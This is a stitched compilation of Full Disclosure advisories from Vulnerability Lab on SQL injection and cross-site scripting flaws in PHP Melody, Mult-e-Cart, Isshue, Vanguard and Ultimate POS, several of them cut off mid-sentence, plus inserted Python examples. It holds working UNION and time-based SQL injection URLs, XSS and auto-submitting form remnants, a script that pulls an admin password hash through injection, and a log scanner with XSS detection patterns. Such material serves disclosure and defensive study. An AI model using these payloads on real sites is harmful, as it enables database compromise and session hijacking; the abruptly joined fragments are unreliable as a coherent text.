[FD] PHP Melody v3.0 - (vid) SQL Injection Vulnerability
Document Title:
===============
PHP Melody v3.0 - (vid) SQL Injection Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2295

Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/

Release Date:
=============
2021-10-20

Vulnerability Laboratory ID (VL-ID):
====================================
2295

Common Vulnerability Scoring System:
====================================
7

Vulnerability Class:
====================
SQL Injection

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing. Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series, TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote SQL injection web vulnerability in the PHP Melody v3.0 video CMS web application.

Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Full Authentication (Admin/Root Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A remote SQL injection vulnerability has been discovered in the PHP Melody v3.0 video CMS web application.
The vulnerability allows remote attackers to inject or execute their own SQL commands to compromise the DBMS or the file system of the web application.

The SQL injection vulnerability is located in the `vid` parameter of the `edit-video.php` file. Remote attackers with moderator or admin privileges are able to execute their own SQL commands by injecting into the GET request. The `vid` parameter in the admin control panel (ACP) UI is not sanitized properly, which allows an attacker to inject SQL commands and compromise the web application and the DBMS.

Exploitation of the SQL injection vulnerability requires no user interaction, but it does require a privileged moderator or admin account. Successful exploitation results in compromise of the database management system, the web server and the web application.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Video Edit

Vulnerable File(s):
[+] edit-video.php

Vulnerable Parameter(s):
[+] vid

Proof of Concept (PoC):
=======================
The remote SQL injection web vulnerability can be exploited by authenticated remote attackers without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Original:
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd&a=4&page=1&filter=added&fv=desc

PoC: Exploitation #1 (UNION-based; the CONCAT() wraps a marker string in hex-encoded delimiters so the injected value can be located in the response)
https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL, CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271), NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

PoC: Exploitation #2 (time-based blind; replace [SLEEPTIME] with the delay in seconds)
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--

PoC: Exploit (HTML page "phpmelody vid sql injection poc"; the embedding markup was lost in extraction, only the embedded URLs remain)
https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL, CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271), NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--

Reference(s):
https://phpmelody.localhost:8000/
https://phpmelody.localhost:8000/admin/
https://phpmelody.localhost:8000/admin/edit-video.php

Solution - Fix & Patch:
=======================
The vulnerability c
[FD] PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability
Document Title:
===============
PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2291

Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/

Release Date:
=============
2021-10-21

Vulnerability Laboratory ID (VL-ID):
====================================
2291

Common Vulnerability Scoring System:
====================================
5.4

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing. Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series, TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the PHP Melody v3.0 video CMS web application.

Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the PHP Melody v3.0 video CMS web application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent cross site scripting vulnerability is located in the video editor (WYSIWYG, tinymce class). Privileged user accounts such as editors are able to inject malicious script code via the editor that is later executed in the browsers of other users or administrators. The injection is prepared in the editor UI (GET); once the content is saved to the DBMS via POST the attack vector becomes persistent.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Editor - Videos (WYSIWYG - tinymce)

Vulnerable File(s):
[+] edit-episode.php

Vulnerable Parameter(s):
[+] episode_id

Affected Module(s):
[+] description

Proof of Concept (PoC):
=======================
The persistent validation vulnerability can be exploited by remote attackers with a privileged editor user account and with low user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.

PoC: Payload (the injected tags were lost in extraction; only the attribute residue survives and is kept as found)
">">" href="https://phpmelody.localhost.com:8080/admin/">
[FD] PHP Melody v3.0 - (submitted) Persistent XSS Vulnerability
Document Title:
===============
PHP Melody v3.0 - (submitted) Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2292

Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/

Release Date:
=============
2021-10-21

Vulnerability Laboratory ID (VL-ID):
====================================
2292

Common Vulnerability Scoring System:
====================================
5.6

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing. Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series, TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the PHP Melody v3.0 video CMS web application.

Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the PHP Melody v3.0 video CMS web application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent input validation vulnerability is located in the `submitted` parameter of `edit-video.php`. Remote attackers with privileged user accounts such as editors or moderators are able to inject malicious script code as the submitting author name. The injection is sent via POST and the code executes with a persistent attack vector in the `watch.php` frontend file.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Edit Video

Vulnerable File(s):
[+] edit-video.php

Vulnerable Parameter(s):
[+] submitted

Affected File(s):
[+] watch.php

Proof of Concept (PoC):
=======================
The persistent validation vulnerability can be exploited by remote attackers with a privileged editor user account and with low user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.

PoC: Example Exploitation
[Username]"><[PAYLOAD]">

PoC: Payload (the injected tag was lost in extraction; residue kept as found)
admin">

--- PoC Session Logs (POST) [edit-video.php - submitted] ---
https://phpmelody.localhost:8080/admin/edit-video.php?vid=22389808b
Host: phpmelody.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---3331529921260143328403993122
Content-Length: 6517
Origin: https://phpmelody.localhost:8080
Connection: keep-alive
Referer: https://phpmelody.localhost:8080/admin/edit-video.php?vid=22389808b
Cookie: PHPSESSID=2ae8ef3142c4517892e6333cee49612a; melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_p900e07810ba03257e53baf46a9ada3c=cc33e6eb60d2c1e31a5612bd8c193c22; sidebar-main-state=maxi; watched_video_list=MTI0LDE%3D; pm_elastic_player=normal
post: submit=Save&video_title=Hi- Test&video_slug=martin-garrix-high-on-life-ft-bonn&file=,,&description=test2&tags=high,high on life,martin,garrix&yt_min=3&yt_sec=48&yt_length=228&allow_comments=1&allow_embedding=1&restricted=0&site_views=6&site_views_input=6&date_month=9&date_day=03&date_year=2021&date_hour=07&date_min=00&date_ampm=am&date_sec=09&submitted=admin"> &direct=https://www.videosourcesi
[FD] Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability
Document Title:
===============
Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2306

Release Date:
=============
2021-10-22

Vulnerability Laboratory ID (VL-ID):
====================================
2306

Common Vulnerability Scoring System:
====================================
7

Vulnerability Class:
====================
SQL Injection

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Digital Multivendor Marketplace Online Store - eShop CMS

(Source: https://ultimate.multecart.com/ & https://www.techraft.in/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple SQL injection web vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) web application.

Affected Product(s):
====================
Techraft
Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-10-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Multiple classic SQL injection web vulnerabilities have been discovered in the Mult-e-Cart Ultimate v2.4 (v2021) web application.
The vulnerabilities allow remote attackers to inject or execute their own SQL commands to compromise the database management system.

The vulnerabilities are located in the `id` parameter of the `view` and `update` functions. The vulnerable modules are `inventory`, `customer`, `vendor` and `order`. Remote attackers with a vendor shop account are able to exploit the vulnerable `id` parameter to execute malicious SQL commands. The injection is sent via GET and the attack vector is located on the client side. The issue is a classic (order by) SQL injection and is exploitable with either of the two vendor roles or with higher privileged roles such as admin.

Exploitation of the SQL injection vulnerabilities requires no user interaction, but it does require a privileged vendor or admin role user account. Successful exploitation results in compromise of the database management system, the web server and the web application.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] inventory/inventory/update
[+] /customer/customer/view
[+] /vendor/vendor/view
[+] /order/sub-order/view-order

Vulnerable Parameter(s):
[+] id

Proof of Concept (PoC):
=======================
The SQL injection web vulnerabilities can be exploited by remote attackers with privileged backend panel access and without user interaction.
For security demonstration or to reproduce the SQL injection web vulnerability follow the provided information and steps below to continue.

PoC: Payloads
1' union select 1,2,3,4,@@version--&edit=t
1' union select 1,2,3,4,@@database--&edit=t

Note: MySQL has no @@database system variable (the current schema is returned by DATABASE()), so of the two payloads above only the @@version one returns data on MySQL as written.

PoC: Exploitation
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5

https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5

PoC: Exploit (HTML page "Mult-E-Cart Ultimate - SQL Injection PoC"; the embedding markup was lost in extraction, only the embedded URLs remain)
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@database--&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@database--&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@database--&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@database--
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@version--&edit=t
https://multecartultimate.localhost:8080/customer/cu
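The two SQL injection advisories above (PHP Melody `edit-video.php?vid=` and the Mult-e-Cart `view`/`update?id=` endpoints) describe the same bug shape: a GET parameter concatenated into a string lookup, exploited with a UNION whose column count has been padded with NULLs (PHP Melody) or with a short `1,2,3,4,5` list (Mult-e-Cart). The following Python is an added example written for this page, not code from either product or from Vulnerability Lab. It models the lookup with SQLite so the UNION technique can be reproduced offline: the `videos`/`users` tables, their rows and all helper names are constructed for the example; SQLite's sqlite_version() stands in for MySQL's @@version, and because SQLite has no SLEEP() the time-based PoC is not modelled. It also decodes the hex delimiters from the PHP Melody CONCAT() payload, the shape sqlmap emits so it can find the extracted value in the response.

```python
"""Added example, not code from PHP Melody, Mult-e-Cart or Vulnerability Lab.
Models the vulnerable `WHERE vid = '<input>'` lookup with SQLite (constructed schema)."""
import sqlite3


def setup():
    """Constructed in-memory database: a 5-column videos table plus a users table."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE videos(id INTEGER PRIMARY KEY, vid TEXT, title TEXT, owner TEXT, restricted INTEGER);
        INSERT INTO videos VALUES (1, '3435b47dd', 'Public clip', 'editor', 0);
        INSERT INTO videos VALUES (2, '22389808b', 'Private clip', 'admin', 1);
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$constructed-hash');
        """
    )
    return con


def lookup_vulnerable(con, vid):
    # String concatenation: the bug class both advisories describe.
    sql = f"SELECT id, vid, title, owner, restricted FROM videos WHERE vid = '{vid}'"
    return con.execute(sql).fetchall()


def lookup_safe(con, vid):
    # Parameterised query: the input is bound as a value and never parsed as SQL.
    sql = "SELECT id, vid, title, owner, restricted FROM videos WHERE vid = ?"
    return con.execute(sql, (vid,)).fetchall()


def find_column_count(con, max_cols=30):
    """How the run of NULLs in the PoC is derived: grow a UNION ALL SELECT NULL,...
    until the DBMS stops rejecting it for a column-count mismatch."""
    for n in range(1, max_cols + 1):
        payload = "-x' UNION ALL SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            lookup_vulnerable(con, payload)
            return n
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
    raise RuntimeError("no column count up to %d matched" % max_cols)


def exfiltrate_admin_hash(con):
    """UNION the users table into the video lookup. The leading '-' makes the
    original WHERE match nothing so only the attacker's row comes back; the
    third column is the hash, the fourth carries the DBMS version string."""
    payload = ("-3435b47dd' UNION ALL SELECT NULL, name, pw_hash, "
               "sqlite_version(), NULL FROM users--")
    rows = lookup_vulnerable(con, payload)
    return rows[0][2]


def decode_markers(prefix_hex, suffix_hex):
    """The PHP Melody PoC's CONCAT(0x7171766b71, <value>, 0x71626a6271) wraps the
    value in ASCII delimiters so the injecting tool can locate it in the page."""
    return bytes.fromhex(prefix_hex).decode(), bytes.fromhex(suffix_hex).decode()


if __name__ == "__main__":
    db = setup()
    print("columns:", find_column_count(db))
    print("leaked:", exfiltrate_admin_hash(db))
    print("parameterised lookup with payload:", lookup_safe(db, "-x' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--"))
    print("markers:", decode_markers("7171766b71", "71626a6271"))
```

The safe variant is the whole fix: `lookup_safe` receives the identical payload and returns nothing because the driver sends the string as a bound value. Input filtering on `vid`/`id` (for example rejecting quotes) is only defence in depth; the PoCs on this page would also be stopped by an allowlist of `[0-9a-f]+` identifiers, but the parameterised query is what removes the bug.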
[FD] Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability
Document Title:
===============
Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2284

Release Date:
=============
2021-10-22

Vulnerability Laboratory ID (VL-ID):
====================================
2284

Common Vulnerability Scoring System:
====================================
5.1

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Multi-store eCommerce shopping cart software is the complete solution for eCommerce business management. It is all in one package for website management with backend admin panel to manage inventory, order, product, invoicing & so on. No need regular monthly subscription fee, get it through one-time payment now. Your eCommerce business frequently changes with the times. All you need is a system that will make your work easier and time-saving. You need the best eCommerce shopping cart software which is flexible, upgradable, affordable. Isshue is a completely secure and fast eCommerce POS system for eCommerce solutions. Isshue is the best choice for any type of e-commerce business, big or small.

(Copy of the Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the Isshue eCommerce Shopping Cart v3.5 web application.

Affected Product(s):
====================
bdtask
Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-08-23: Researcher Notification & Coordination (Security Researcher)
2021-08-24: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
Medium User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Isshue eCommerce Shopping Cart v3.5 web application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The input validation vulnerability is located in the `title` input field of the `new invoice`, `customer` and `stock` modules. The `title` input and parameter allow injection of malicious script code with a persistent attack vector. The content of the input is validated insecurely, which allows remote attackers with privileged user accounts (manager/keeper/admin) to inject malformed script code that executes on preview. The injection is sent via POST and the attack vector is persistent on the application side.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Edit Title

Vulnerable Input(s):
[+] Title

Vulnerable Parameter(s):
[+] title

Affected Module(s):
[+] stock
[+] customer
[+] invoice

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a keeper account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Vulnerable Source (the surrounding markup was lost in extraction; the attribute residue is kept as found):
"[MALICIOUS INJECTED SCRIPT CODE!] Edit title Unpin Reload Minimize Fullscreen Close
https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice"; class="form-vertical" id="validate" name="insert_invoice" enctype="multipart/form-data" method="post" accept-charset="utf-8" novalidate="novalidate">
Customer Name *

--- PoC Session Logs (GET) [Execute] ---
https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source
Host: isshue.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice
Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327b
[FD] Vanguard v2.1 - (Search) POST Inject Web Vulnerability
Document Title:
===============
Vanguard v2.1 - (Search) POST Inject Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2283

Release Date:
=============
2021-10-26

Vulnerability Laboratory ID (VL-ID):
====================================
2283

Common Vulnerability Scoring System:
====================================
4

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a POST inject web vulnerability in the Vanguard v2.1 CMS web application.

Affected Product(s):
====================
VanguardInfini
Product: Vanguard v2.1 - CMS (PHP) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A non-persistent POST inject web vulnerability has been discovered in the official Vanguard v2.1 CMS web application.
The vulnerability allows remote attackers to inject malicious script code through POST requests to compromise user session data or to manipulate application content shown to clients.

The vulnerability is located in the `phps_query` parameter of the search module. It is a classic POST injection web vulnerability with a non-persistent attack vector: the search term is reflected unescaped into the result page, and because the injection point is a POST body the attacker has to make the victim's browser submit the request (the PoC below does this with an auto-submitting cross-site form).

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Input(s):
[+] Search

Vulnerable Parameter(s):
[+] phps_query

Proof of Concept (PoC):
=======================
The client-side POST inject web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

Vulnerable Source (markup lost in extraction; residue kept as found):
search https://vanguard.squamifer.ovh/search";> " placeholder="Search for a product..."> Search No results found for .

--- PoC Session Logs [POST] ---
https://vanguard.localhost:8080/search
Host: vanguard.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: https://vanguard.localhost:8080
Connection: keep-alive
Referer: https://vanguard.localhost:8080/
Cookie: PHPSESSID=57d86e593a55e069d1e6c728ce20b3b8
phps_query=">%20&phps_search=;)
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
pragma: no-cache
cache-control: private
vary: Accept-Encoding

Exploitation: PoC (HTML page that auto-submits a form to /search; the markup was lost in extraction, residue kept as found)
PoC PoC #nodisplay { display:none; } https://vanguard.localhost:8080/search"; method="post"> function submitForm() { document.forms[0].submit(); } submitForm();

Security Risk:
==============
The security risk of the validation web vulnerability in the web application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   www.vulnerability-lab.com   www.vuln-lab.com   www.vulnerability-db.com
Services:  magazine.vulnerability-lab.com   paste.vulnerability-db.com   infosec.vulnerability-db.com
Social:    twitter.com/vuln_la
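Because the Vanguard injection point is a POST body, the attempt never appears in the query string of an ordinary access log; a proxy, WAF or application log that records form bodies is needed to see it. The following Python is an added example written for this page (not Vanguard's or Vulnerability Lab's code) that scans such records for the `">` attribute break-out and the script/handler tokens the `phps_query` PoC above relies on. The log lines are constructed for the example, the second one mirroring the PoC body `phps_query=">%20&phps_search=;)`; the one-JSON-object-per-line format with `method`, `path` and `body` fields is an assumption, not something the page describes.

```python
"""Added example, not code from Vanguard or Vulnerability Lab.
Scans constructed POST-body log records for reflected-XSS attempts in watched form fields."""
import json
import re
from urllib.parse import parse_qs, unquote_plus

# Tokens that leave an attribute/tag context or introduce executable content.
# Deliberately small and readable; tune to the application's own forms.
SUSPECT = re.compile(
    r'"\s*>|<\s*/?\s*(script|iframe|img|svg|a)\b|\bon[a-z]+\s*=|javascript:',
    re.IGNORECASE,
)

# Constructed sample log (assumed format: one JSON record per line).
SAMPLE_LOG = """
{"method":"POST","path":"/search","body":"phps_query=blue+headphones&phps_search="}
{"method":"POST","path":"/search","body":"phps_query=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E&phps_search="}
{"method":"POST","path":"/search","body":"phps_query=%22%3E%20&phps_search=%3B)"}
{"method":"GET","path":"/product/12","body":""}
""".strip()


def decode_fields(body):
    """Decode an x-www-form-urlencoded body. parse_qs already percent-decodes once;
    the second unquote_plus pass catches double-encoded payloads."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: [unquote_plus(v) for v in vs] for k, vs in fields.items()}


def scan(log_text, watched=("phps_query",)):
    """Return (line_no, field, decoded_value, matched_token) for every watched
    field in a POST record whose decoded value contains a suspect token."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        rec = json.loads(line)
        if rec["method"] != "POST":
            continue
        for field, values in decode_fields(rec["body"]).items():
            if field not in watched:
                continue
            for value in values:
                m = SUSPECT.search(value)
                if m:
                    hits.append((line_no, field, value, m.group(0)))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d: %s=%r matched %r" % hit)
```

Restricting the check to named fields keeps the noisy `">` token from firing on every search term that happens to contain a quote. A request-side rule like this only says that someone tried; the stronger signal is the response, so if the application log also captures the rendered page, alert on the decoded `phps_query` value appearing verbatim (unescaped) in it.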
[FD] Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability
Document Title:
===============
Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2296

Release Date:
=============
2021-10-26

Vulnerability Laboratory ID (VL-ID):
====================================
2296

Common Vulnerability Scoring System:
====================================
5.6

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
The Ultimate POS is an ERP, stock management, point of sale & invoicing web application. The application uses a MySQL database management system in combination with PHP 7.2.

(Copy of the Homepage: https://ultimatefosters.com/docs/ultimatepos/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Ultimate POS v4.4 ERP stock management web application.

Affected Product(s):
====================
thewebfosters
Product: Ultimate POS v4.4 - ERP (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent cross site scripting vulnerability has been discovered in the Ultimate POS v4.4 ERP stock management web application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent validation vulnerability is located in the `name` parameter of the add products module. Remote attackers with vendor privileges sufficient to add products are able to inject malicious script code. The injection is sent via POST and the attack vector is persistent. Injection is possible both when editing an existing product and when creating a new one.

